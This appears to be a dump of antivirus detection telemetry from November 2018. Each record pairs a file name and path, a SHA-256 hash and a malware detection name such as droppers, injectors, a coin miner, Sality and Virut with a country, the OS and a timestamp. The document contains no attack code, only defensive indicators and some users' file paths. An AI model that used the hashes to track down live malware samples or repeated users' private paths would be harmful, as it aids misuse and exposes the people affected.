  Row(detection=Row(filename='avscan-20181102-055345-a14a4b78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055345-A14A4B78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061129-1ba536f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061129-1BA536F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053005-53334a09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053005-53334A09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061103-0c2e466c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061103-0C2E466C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060303-edf5b453', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060303-EDF5B453', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052352-74bb4617', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052352-74BB4617', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054509-6dbec548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054509-6DBEC548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053833-823091f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053833-823091F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052116-17c21313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052116-17C21313', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051311-f67bc55c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051311-F67BC55C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060041-99562136', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060041-99562136', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061934-3cc77925', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061934-3CC77925', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_14b9a7c6.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_14b9a7c6.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:04:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:04:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051130-ba8f67c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051130-BA8F67C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061528-a9d9d3ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061528-A9D9D3BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052030-fc97313b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052030-FC97313B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055844-537dc787', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055844-537DC787', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054420-50c7316d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054420-50C7316D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052505-a06410db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052505-A06410DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055944-77b70549', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055944-77B70549', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050659-193bb1f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050659-193BB1F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051709-845359bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051709-845359BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7dc7945f86950422e06bbdb366b7cadf1bffdf551e89fdebf61abba37561bb9d', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\7DC7945F86950422E06BBDB366B7CADF1BFFDF551E89FDEBF61ABBA37561BB9D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7dc7945f86950422e06bbdb366b7cadf1bffdf551e89fdebf61abba37561bb9d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060736-90d847db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060736-90D847DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054843-ed741aa5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054843-ED741AA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050900-60faab49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050900-60FAAB49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062259-b6d4f7b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062259-B6D4F7B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050657-17de44bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050657-17DE44BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051429-24f96998', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051429-24F96998', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:16:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050809-429c8548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050809-429C8548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051405-1725b839', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051405-1725B839', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000121e', filepath='C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\aquarius\\tmp00001e63\\tmp0000121e', filesize=15360000, name='TR/Crypt.PEPM.Gen.#M300.#R4969'), hash='3aae9865e80d3c2443afe8c751664fdd09d51c0573a148c2b8f46fcb7b742830', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\fssm32.exe', parentsize=1078312, timestamp='2018-11-01T17:52:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-041134-2a29e3e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7741a6d\\AVSCAN-20181102-040844-166805B3\\AVSCAN-20181102-041134-2A29E3E8', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:11:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T21:48:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='meeting p2k3 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\notulen meeting p2k3 2015\\meeting p2k3 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:12:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171524-a43a1b47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171403-95C619DC\\AVSCAN-20181101-171524-A43A1B47', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kerja.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\MASA KERJA\\KERJA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhdbb1.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHDBB1.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:39:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='243d549bc467c61e89f7fb4ddd8fda7bf51413cdf787aeac563b414f57caa2cf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\243D549BC467C61E89F7FB4DDD8FDA7BF51413CDF787AEAC563B414F57CAA2CF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='243d549bc467c61e89f7fb4ddd8fda7bf51413cdf787aeac563b414f57caa2cf', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:58:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aladdin.exe', filepath='\\?\\J:\\العاب2\\علاءالدين\\Aladdin.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='26174cd8a598080bc31ba906063d8534dd5dce261930b97614d1d3b50f627b6a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152046-1a986650', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152046-1A986650', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:11:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dec6iksr.dll', filepath='\\?\\C:\\Windows\\DEC6ikSr.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195628-0d51f1bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195628-0D51F1BC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='404502f49899c86d1e8a37e9e74a14402c05702ac445e862e408d52cb3428efb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:56:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh1e82.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH1E82.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:30:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:59Z'), dt=datetime.date(2018, 11, 1)),
